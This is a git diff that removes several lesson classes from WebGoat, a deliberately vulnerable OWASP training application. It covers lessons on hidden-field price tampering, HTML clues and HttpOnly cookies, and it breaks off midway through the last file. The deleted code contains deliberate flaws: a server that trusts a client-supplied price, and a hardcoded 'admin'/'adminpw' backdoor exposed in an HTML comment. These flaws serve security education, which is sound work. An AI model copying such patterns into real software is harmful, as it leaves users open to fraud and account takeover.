- .getInt("manager"), answer_results.getString("start_date"), answer_results
- .getInt("salary"), answer_results.getString("ccn"), answer_results
- .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
- .getString("disciplined_notes"), answer_results.getString("personal_description"));
- /*
- * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
- * " " + profile.getLastName() + " (" + profile.getId() + ")");
- */}
- } catch (SQLException sqle)
- {
- s.setMessage("Error getting employee profile");
- sqle.printStackTrace();
- }
- } catch (Exception e)
- {
- s.setMessage("Error getting employee profile");
- e.printStackTrace();
- }
-
- return profile;
- }
-
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/HiddenFieldTampering.java b/src/main/java/org/owasp/webgoat/lessons/HiddenFieldTampering.java
deleted file mode 100644
index 9a8bc1823..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/HiddenFieldTampering.java
+++ /dev/null
@@ -1,230 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.text.DecimalFormat;
-import java.util.ArrayList;
-import java.util.List;
-import java.util.regex.Pattern;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.B;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Center;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.P;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TH;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- *
- * @author Jeff Williams Aspect Security
- * @author Bruce Mayhew WebGoat
- * @created October 28, 2003
- */
-public class HiddenFieldTampering extends LessonAdapter
-{
- public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
- .addElement(
- new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
- .setVspace(0));
-
- private final static String PRICE = "Price";
-
- private final static String PRICE_TV = "2999.99";
-
- private final static String PRICE_TV_HACKED = "9.99";
-
- String regex = "^" + PRICE_TV + "$"; // obviously the "." will match any char - any
- // interesting exploit!
- Pattern pattern1 = Pattern.compile(regex);
- String lineSep = System.getProperty("line.separator");
- String script = "" + lineSep;
-
- /**
- * Constructor for the HiddenFieldScreen object
- */
- public HiddenFieldTampering()
- {
- }
-
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element createContent(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
- ec.addElement(new StringElement(script));
- float quantity;
- float total;
- String price = PRICE_TV;
- DecimalFormat money = new DecimalFormat("$0.00");
- try
- {
- price = s.getParser().getRawParameter(PRICE, PRICE_TV);
- quantity = s.getParser().getFloatParameter("QTY", 1.0f);
- total = quantity * Float.parseFloat(price);
- } catch (Exception e)
- {
- s.setMessage(getLabelManager().get("Invaild data") + this.getClass().getName());
- price = PRICE_TV;
- quantity = 1.0f;
- total = quantity * Float.parseFloat(PRICE_TV);
-
- }
-
- if (price.equals(PRICE_TV))
- {
- ec.addElement(new Center().addElement(new H1().addElement(getLabelManager().get("ShoppingCart"))));
- ec.addElement(new BR());
- Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
-
- if (s.isColor())
- {
- t.setBorder(1);
- }
-
- TR tr = new TR();
- tr.addElement(new TH().addElement(getLabelManager().get("ShoppingCartItems")).setWidth("80%"));
- tr.addElement(new TH().addElement(getLabelManager().get("Price")).setWidth("10%"));
- tr.addElement(new TH().addElement(getLabelManager().get("Quantity")).setWidth("3%"));
- tr.addElement(new TH().addElement(getLabelManager().get("Total")).setWidth("7%"));
- t.addElement(tr);
-
- tr = new TR();
- tr.addElement(new TD().addElement("56 inch HDTV (model KTV-551)"));
- tr.addElement(new TD().addElement(PRICE_TV).setAlign("right"));
- tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY", 1).setSize(6)).setAlign("right"));
- tr.addElement(new TD().addElement(money.format(total)));
- t.addElement(tr);
-
- ec.addElement(t);
-
- t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
- if (s.isColor())
- {
- t.setBorder(1);
- }
-
- ec.addElement(new BR());
- tr = new TR();
- tr.addElement(new TD().addElement(getLabelManager().get("TotalChargedCreditCard")+":"));
- tr.addElement(new TD().addElement(money.format(total)));
- tr.addElement(new TD().addElement(ECSFactory.makeButton(getLabelManager().get("UpdateCart"))));
- tr.addElement(new TD().addElement(ECSFactory.makeButton(getLabelManager().get("Purchase"), "validate()")));
- t.addElement(tr);
-
- ec.addElement(t);
-
- Input input = new Input(Input.HIDDEN, PRICE, PRICE_TV);
- ec.addElement(input);
- ec.addElement(new BR());
-
- }
- else
- {
- if (!price.toString().equals(PRICE_TV))
- {
- makeSuccess(s);
- }
-
- ec.addElement(new P().addElement(getLabelManager().get("TotalPriceIs")+":"));
- ec.addElement(new B("$" + total));
- ec.addElement(new BR());
- ec.addElement(new P().addElement(getLabelManager().get("ThisAmountCharged")));
- }
-
- return (ec);
- }
-
- /**
- * DOCUMENT ME!
- *
- * @return DOCUMENT ME!
- */
- protected Category getDefaultCategory()
- {
- return Category.PARAMETER_TAMPERING;
- }
-
- /**
- * Gets the hints attribute of the HiddenFieldScreen object
- *
- * @return The hints value
- */
- protected List getHints(WebSession s)
- {
- List hints = new ArrayList();
-
- hints.add(getLabelManager().get("HiddenFieldTamperingHint1"));
- hints.add(getLabelManager().get("HiddenFieldTamperingHint2"));
- hints.add(getLabelManager().get("HiddenFieldTamperingHint3")+ PRICE_TV +getLabelManager().get("HiddenFieldTamperingHint32") + PRICE_TV_HACKED );
-
- return hints;
- }
-
-
-
- private final static Integer DEFAULT_RANKING = new Integer(50);
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
- /**
- * Gets the title attribute of the HiddenFieldScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("Exploit Hidden Fields");
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("", ASPECT_LOGO);
- }
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/HowToWork.java b/src/main/java/org/owasp/webgoat/lessons/HowToWork.java
deleted file mode 100644
index 07a32acaf..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/HowToWork.java
+++ /dev/null
@@ -1,89 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- *
- * @author Reto Lippuner, Marcel Wirth
- * @created April 4, 2008
- */
-public class HowToWork extends LessonAdapter
-{
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element createContent(WebSession s)
- {
- makeSuccess(s);
- ElementContainer ec = new ElementContainer();
- ec.addElement(new StringElement("Welcome to WebGoat !!"));
- return (ec);
- }
-
- /**
- * Gets the category attribute of the HowToWork object
- *
- * @return The category value
- */
- protected Category getDefaultCategory()
- {
- return Category.INTRODUCTION;
- }
-
- private final static Integer DEFAULT_RANKING = new Integer(10);
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
- /**
- * Gets the title attribute of the DirectoryScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("How to work with WebGoat");
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("Created by: Reto Lippuner, Marcel Wirth", new StringElement(""));
- }
-
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/HtmlClues.java b/src/main/java/org/owasp/webgoat/lessons/HtmlClues.java
deleted file mode 100644
index d04be31f0..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/HtmlClues.java
+++ /dev/null
@@ -1,240 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.B;
-import org.apache.ecs.html.Comment;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.P;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TH;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- *
- * @author Jeff Williams Aspect Security
- * @created October 28, 2003
- */
-public class HtmlClues extends LessonAdapter
-{
- public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
- .addElement(
- new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
- .setVspace(0));
-
- /**
- * Description of the Field
- */
- protected final static String PASSWORD = "Password";
-
- /**
- * Description of the Field
- */
- protected final static String USERNAME = "Username";
-
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
- private boolean backdoor(WebSession s)
- {
- String username = s.getParser().getRawParameter(USERNAME, "");
- String password = s.getParser().getRawParameter(PASSWORD, "");
-
- //
- return (username.equals("admin") && password.equals("adminpw"));
- //
- }
-
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element createContent(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
-
- try
- {
- //
- ec.addElement(new Comment("FIXME admin:adminpw"));
- //
- ec.addElement(new Comment("Use Admin to regenerate database"));
-
- if (backdoor(s))
- {
- makeSuccess(s);
-
- s.setMessage(getLabelManager().get("HtmlCluesBINGO"));
- ec.addElement(makeUser(s, "admin", "CREDENTIALS"));
- }
- else
- {
- ec.addElement(makeLogin(s));
- }
- } catch (Exception e)
- {
- s.setMessage("Error generating " + this.getClass().getName());
- }
-
- return (ec);
- }
-
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @param user
- * Description of the Parameter
- * @param method
- * Description of the Parameter
- * @return Description of the Return Value
- * @exception Exception
- * Description of the Exception
- */
- protected Element makeUser(WebSession s, String user, String method) throws Exception
- {
- ElementContainer ec = new ElementContainer();
- ec.addElement(new P().addElement(getLabelManager().get("WelcomeUser")+ user));
- ec.addElement(new P().addElement(getLabelManager().get("YouHaveBeenAuthenticatedWith") + method));
-
- return (ec);
- }
-
- protected Element makeLogin(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
-
- ec.addElement(new H1().addElement("Sign In "));
- Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
- if (s.isColor())
- {
- t.setBorder(1);
- }
-
- TR tr = new TR();
- tr.addElement(new TH()
- .addElement(getLabelManager().get("WeakAuthenticationCookiePleaseSignIn"))
- .setColSpan(2).setAlign("left"));
- t.addElement(tr);
-
- tr = new TR();
- tr.addElement(new TD().addElement("*"+getLabelManager().get("RequiredFields")).setWidth("30%"));
- t.addElement(tr);
-
- tr = new TR();
- tr.addElement(new TD().addElement(" ").setColSpan(2));
- t.addElement(tr);
-
- TR row1 = new TR();
- TR row2 = new TR();
- row1.addElement(new TD(new B(new StringElement("*"+getLabelManager().get("UserName")+": "))));
- row2.addElement(new TD(new B(new StringElement("*"+getLabelManager().get("Password")+": "))));
-
- Input input1 = new Input(Input.TEXT, USERNAME, "");
- Input input2 = new Input(Input.PASSWORD, PASSWORD, "");
- row1.addElement(new TD(input1));
- row2.addElement(new TD(input2));
- t.addElement(row1);
- t.addElement(row2);
-
- Element b = ECSFactory.makeButton(getLabelManager().get("Login"));
- t.addElement(new TR(new TD(b)));
- ec.addElement(t);
-
- return (ec);
- }
-
- /**
- * Gets the hints attribute of the CluesScreen object
- *
- * @return The hints value
- */
- protected List getHints(WebSession s)
- {
- List hints = new ArrayList();
- hints.add(getLabelManager().get("HtmlCluesHint1"));
- hints.add(getLabelManager().get("HtmlCluesHint2"));
- hints.add(getLabelManager().get("HtmlCluesHint3"));
-
- return hints;
- }
-
-
-
- private final static Integer DEFAULT_RANKING = new Integer(30);
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
- /**
- * Gets the category attribute of the FailOpenAuthentication object
- *
- * @return The category value
- */
- protected Category getDefaultCategory()
- {
- return Category.CODE_QUALITY;
- }
-
- /**
- * Gets the title attribute of the CluesScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("Discover Clues in the HTML");
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("", ASPECT_LOGO);
- }
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/HttpBasics.java b/src/main/java/org/owasp/webgoat/lessons/HttpBasics.java
deleted file mode 100644
index c5be5587d..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/HttpBasics.java
+++ /dev/null
@@ -1,123 +0,0 @@
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Input;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-/**
- * *************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
- *
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
- * for free software projects.
- *
- * For details, please see http://webgoat.github.io
- *
- * @author Bruce Mayhew WebGoat
- * @created October 28, 2003
- */
-public class HttpBasics extends LessonAdapter {
-
- private final static String PERSON = "person";
-
- /**
- * Description of the Method
- *
- * @param s Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element createContent(WebSession s) {
- ElementContainer ec = new ElementContainer();
-
- StringBuffer person = null;
- try {
- ec.addElement(new BR());
- ec.addElement(new StringElement(getLabelManager().get("EnterYourName") + ": "));
-
- person = new StringBuffer(s.getParser().getStringParameter(PERSON, ""));
- person.reverse();
-
- Input input = new Input(Input.TEXT, PERSON, person.toString());
- ec.addElement(input);
-
- Element b = ECSFactory.makeButton(getLabelManager().get("Go!"));
- ec.addElement(b);
- } catch (Exception e) {
- s.setMessage("Error generating " + this.getClass().getName());
- e.printStackTrace();
- }
-
- if (!person.toString().equals("") && getLessonTracker(s).getNumVisits() > 3) {
- makeSuccess(s);
- }
-
- return (ec);
- }
-
- /**
- * Gets the hints attribute of the HelloScreen object
- *
- * @return The hints value
- */
- public List getHints(WebSession s) {
- List hints = new ArrayList();
- hints.add("Type in your name and press 'go'");
- hints.add("Turn on Show Parameters or other features");
- hints.add("Try to intercept the request with OWASP ZAP");
- hints.add("Press the Show Lesson Plan button to view a lesson summary");
- hints.add("Press the Show Solution button to view a lesson solution");
-
- return hints;
- }
-
- /**
- * Gets the ranking attribute of the HelloScreen object
- *
- * @return The ranking value
- */
- private final static Integer DEFAULT_RANKING = new Integer(10);
-
- protected Integer getDefaultRanking() {
- return DEFAULT_RANKING;
- }
-
- protected Category getDefaultCategory() {
- return Category.GENERAL;
- }
-
- /**
- * Gets the title attribute of the HelloScreen object
- *
- * @return The title value
- */
- public String getTitle() {
- return ("Http Basics");
- }
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/HttpOnly.java b/src/main/java/org/owasp/webgoat/lessons/HttpOnly.java
deleted file mode 100644
index ff3769f14..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/HttpOnly.java
+++ /dev/null
@@ -1,522 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.Date;
-import java.util.List;
-import java.security.MessageDigest;
-import javax.servlet.http.HttpServletResponse;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.Form;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.WebSession;
-import sun.misc.BASE64Encoder;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- */
-public class HttpOnly extends LessonAdapter
-{
-
- public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
- .addElement(
- new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
- .setVspace(0));
-
- private final static Integer DEFAULT_RANKING = new Integer(125);
-
- private final static String UNIQUE2U = "unique2u";
-
- private final static String HTTPONLY = "httponly";
-
- private final static String HTTPONLY_VALUE = "httponly_value";
-
- private final static String ACTION = "action";
-
- private final static String READ = "Read Cookie";
-
- private final static String WRITE = "Write Cookie";
-
- private final static String READ_RESULT = "read_result";
-
- private boolean httpOnly = false;
-
- private boolean readSuccess = false;
-
- private boolean writeSuccess = false;
-
- private String original = "undefined";
-
- /**
- * Gets the title attribute of the EmailScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("HTTPOnly Test");
- }
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- protected Element createContent(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
- String action = null;
- String http = null;
-
- http = s.getRequest().getParameter(HTTPONLY);
- action = s.getRequest().getParameter(ACTION);
-
- if (http != null)
- {
- httpOnly = Boolean.parseBoolean(http);
- }
-
- if (httpOnly)
- {
- // System.out.println("HttpOnly: Setting HttpOnly for cookie");
- setHttpOnly(s);
- }
- else
- {
- // System.out.println("HttpOnly: Removing HttpOnly for cookie");
- removeHttpOnly(s);
- }
-
- if (action != null)
- {
- if (action.equals(READ))
- {
- handleReadAction(s);
- }
- else if (action.equals(WRITE))
- {
- handleWriteAction(s);
- }
- else
- {
- // s.setMessage("Invalid Request. Please try again.");
- }
- }
-
- try
- {
- ec.addElement(makeContent(s));
- } catch (Exception e)
- {
- s.setMessage("Error generating " + this.getClass().getName());
- e.printStackTrace();
- }
-
- return (ec);
- }
-
- /**
- * DOCUMENT ME!
- *
- * @return DOCUMENT ME!
- */
- protected Category getDefaultCategory()
- {
- return Category.XSS;
- }
-
- /**
- * Gets the hints attribute of the EmailScreen object
- *
- * @return The hints value
- */
- protected List getHints(WebSession s)
- {
- List hints = new ArrayList();
- hints.add("Read the directions and try out the buttons.");
- return hints;
- }
-
- private String createCustomCookieValue()
- {
- String value = null;
- byte[] buffer = null;
- MessageDigest md = null;
- BASE64Encoder encoder = new BASE64Encoder();
-
- try
- {
- md = MessageDigest.getInstance("SHA");
- buffer = new Date().toString().getBytes();
-
- md.update(buffer);
- value = encoder.encode(md.digest());
- original = value;
-
- } catch (Exception e)
- {
- e.printStackTrace();
- }
-
- return value;
- }
-
- private void setHttpOnly(WebSession s)
- {
- String value = createCustomCookieValue();
- HttpServletResponse response = s.getResponse();
- String cookie = s.getCookie(UNIQUE2U);
-
- if (cookie == null || cookie.equals("HACKED"))
- {
- response.setHeader("Set-Cookie", UNIQUE2U + "=" + value + "; HttpOnly");
- original = value;
- }
- else
- {
- response.setHeader("Set-Cookie", UNIQUE2U + "=" + cookie + "; HttpOnly");
- original = cookie;
- }
- }
-
- private void removeHttpOnly(WebSession s)
- {
- String value = createCustomCookieValue();
- HttpServletResponse response = s.getResponse();
- String cookie = s.getCookie(UNIQUE2U);
-
- if (cookie == null || cookie.equals("HACKED"))
- {
- response.setHeader("Set-Cookie", UNIQUE2U + "=" + value + ";");
- original = value;
- }
- else
- {
- response.setHeader("Set-Cookie", UNIQUE2U + "=" + cookie + ";");
- original = cookie;
- }
- }
-
- private ElementContainer makeContent(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
- Element r = null;
- Element hidden_r = null;
- Table t = null;
- TR tr = null;
- Form f = null;
-
- ec.addElement(new StringElement(getJavaScript()));
-
- f = new Form();
-
- t = new Table();
- t.setWidth(500);
-
- tr = new TR();
-
- tr.addElement(new TD(new StringElement("Your browser appears to be: " + getBrowserType(s))));
- t.addElement(tr);
-
- tr = new TR();
- t.addElement(tr);
-
- tr = new TR();
-
- tr.addElement(new TD(new StringElement("Do you wish to turn HTTPOnly on?")));
-
- tr.addElement(new TD(new StringElement("Yes")));
-
- if (httpOnly == true)
- {
- r = new Input(Input.RADIO, HTTPONLY_VALUE, "True").addAttribute("Checked", "true");
- }
- else
- {
- r = new Input(Input.RADIO, HTTPONLY_VALUE, "True").addAttribute("onClick", "document.form.httponly.click();");
- hidden_r = new Input(Input.SUBMIT, HTTPONLY, "True").addAttribute("style", "visibility:hidden");
- }
-
- tr.addElement(new TD(r));
-
- tr.addElement(new TD(new StringElement("No")));
-
- if (httpOnly == false)
- {
- r = new Input(Input.RADIO, HTTPONLY_VALUE, "False").addAttribute("Checked", "false");
- }
- else
- {
- r = new Input(Input.RADIO, HTTPONLY_VALUE, "False").addAttribute("onClick", "document.form.httponly.click();");
- hidden_r = new Input(Input.SUBMIT, HTTPONLY, "False").addAttribute("style", "visibility:hidden");
- }
-
- tr.addElement(new TD(r));
- tr.addElement(hidden_r);
-
- r = new Input(Input.HIDDEN, READ_RESULT, "");
- tr.addElement(r);
-
- t.addElement(tr);
-
- /*
- * tr.addElement(new TD(new StringElement("Status: " ))); t.addElement(tr);
- * if(httpOnly == true) { tr.addElement(new TD(new StringElement("
"))); } t.addElement(tr); t.addElement(new TR(new TD(new
- * StringElement(" "))));
- */f.addElement(t);
-
- t = new Table();
- tr = new TR();
-
- r = new Input(Input.SUBMIT, ACTION, READ).addAttribute("onclick", "myAlert();");
- tr.addElement(new TD(r));
-
- r = new Input(Input.SUBMIT, ACTION, WRITE).addAttribute("onclick", "modifyAlert();");
- tr.addElement(new TD(r));
- t.addElement(tr);
-
- f.addElement(t);
- ec.addElement(f);
-
- return ec;
- }
-
- private void handleReadAction(WebSession s)
- {
-
- String displayed = s.getRequest().getParameter(READ_RESULT);
-
- if (httpOnly == true)
- {
- if (displayed.indexOf(UNIQUE2U) != -1)
- {
- s.setMessage("FAILURE: Your browser did not enforce the HTTPOnly flag properly for the '" + UNIQUE2U
- + "' cookie. It allowed direct client side read access to this cookie.");
- }
- else
- {
- s.setMessage("SUCCESS: Your browser enforced the HTTPOnly flag properly for the '" + UNIQUE2U
- + "' cookie by preventing direct client side read access to this cookie.");
- if (writeSuccess)
- {
- if (!this.isCompleted(s))
- {
- makeSuccess(s);
- readSuccess = false;
- writeSuccess = false;
- }
- }
- else
- {
- if (!this.isCompleted(s))
- {
- s.setMessage("Now try to see if your browser protects write access to this cookie.");
- readSuccess = true;
- }
- }
- }
- }
- else if (displayed.indexOf(UNIQUE2U) != -1)
- {
- s.setMessage("Since HTTPOnly was not enabled, the '" + UNIQUE2U
- + "' cookie was displayed in the alert dialog.");
- }
- else
- {
- s.setMessage("Since HTTPOnly was not enabled, the '" + UNIQUE2U
- + "' cookie should have been displayed in the alert dialog, but was not for some reason. "
- + "(This shouldn't happen)");
- }
- }
-
- private void handleWriteAction(WebSession s)
- {
- String hacked = s.getCookie(UNIQUE2U);
-
- if (httpOnly == true)
- {
- if (!original.equals(hacked))
- {
- s
- .setMessage("FAILURE: Your browser did not enforce the write protection property of the HTTPOnly flag for the '"
- + UNIQUE2U + "' cookie.");
- s.setMessage("The " + UNIQUE2U + " cookie was successfully modified to " + hacked
- + " on the client side.");
- }
- else
- {
- s
- .setMessage("SUCCESS: Your browser enforced the write protection property of the HTTPOnly flag for the '"
- + UNIQUE2U + "' cookie by preventing client side modification.");
- if (readSuccess)
- {
- if (!this.isCompleted(s))
- {
- makeSuccess(s);
- readSuccess = false;
- writeSuccess = false;
- }
- }
- else
- {
- if (!this.isCompleted(s))
- {
- s.setMessage("Now try to see if your browser protects read access to this cookie.");
- writeSuccess = true;
- }
- }
- }
- }
- else if (!original.equals(hacked))
- {
- s.setMessage("Since HTTPOnly was not enabled, the browser allowed the '" + UNIQUE2U
- + "' cookie to be modified on the client side.");
- }
- else
- {
- s.setMessage("Since HTTPOnly was not enabled, the browser should have allowed the '" + UNIQUE2U
- + "' cookie to be modified on the client side, but it was not for some reason. "
- + "(This shouldn't happen)");
- }
- }
-
- private String getJavaScript()
- {
- StringBuffer buffer = new StringBuffer();
-
- buffer.append("\n");
-
- return buffer.toString();
- }
-
- private String getBrowserType(WebSession s)
- {
- int offset = -1;
- String result = "unknown";
- String browser = s.getHeader("user-agent").toLowerCase();
-
- if (browser != null)
- {
- if (browser.indexOf("firefox") != -1)
- {
- browser = browser.substring(browser.indexOf("firefox"));
-
- offset = getOffset(browser);
-
- result = browser.substring(0, offset);
- }
- else if (browser.indexOf("msie 6") != -1)
- {
- result = "Internet Explorer 6";
- }
- else if (browser.indexOf("msie 7") != -1)
- {
- result = "Internet Explorer 7";
- }
- else if (browser.indexOf("msie") != -1)
- {
- result = "Internet Explorer";
- }
- else if (browser.indexOf("opera") != -1)
- {
- result = "Opera";
- }
- else if (browser.indexOf("safari") != -1)
- {
- result = "Safari";
- }
- else if (browser.indexOf("netscape") != -1)
- {
- browser = browser.substring(browser.indexOf("netscape"));
-
- offset = getOffset(browser);
-
- result = browser.substring(0, offset);
- }
- else if (browser.indexOf("konqueror") != -1)
- {
- result = "Konqueror";
- }
- else if (browser.indexOf("mozilla") != -1)
- {
- result = "Mozilla";
- }
- }
-
- return result;
- }
-
- private int getOffset(String s)
- {
- int result = s.length();
-
- for (int i = 0; i < s.length(); i++)
- {
- if (s.charAt(i) < 33 || s.charAt(i) > 126)
- {
- result = i;
- break;
- }
- }
-
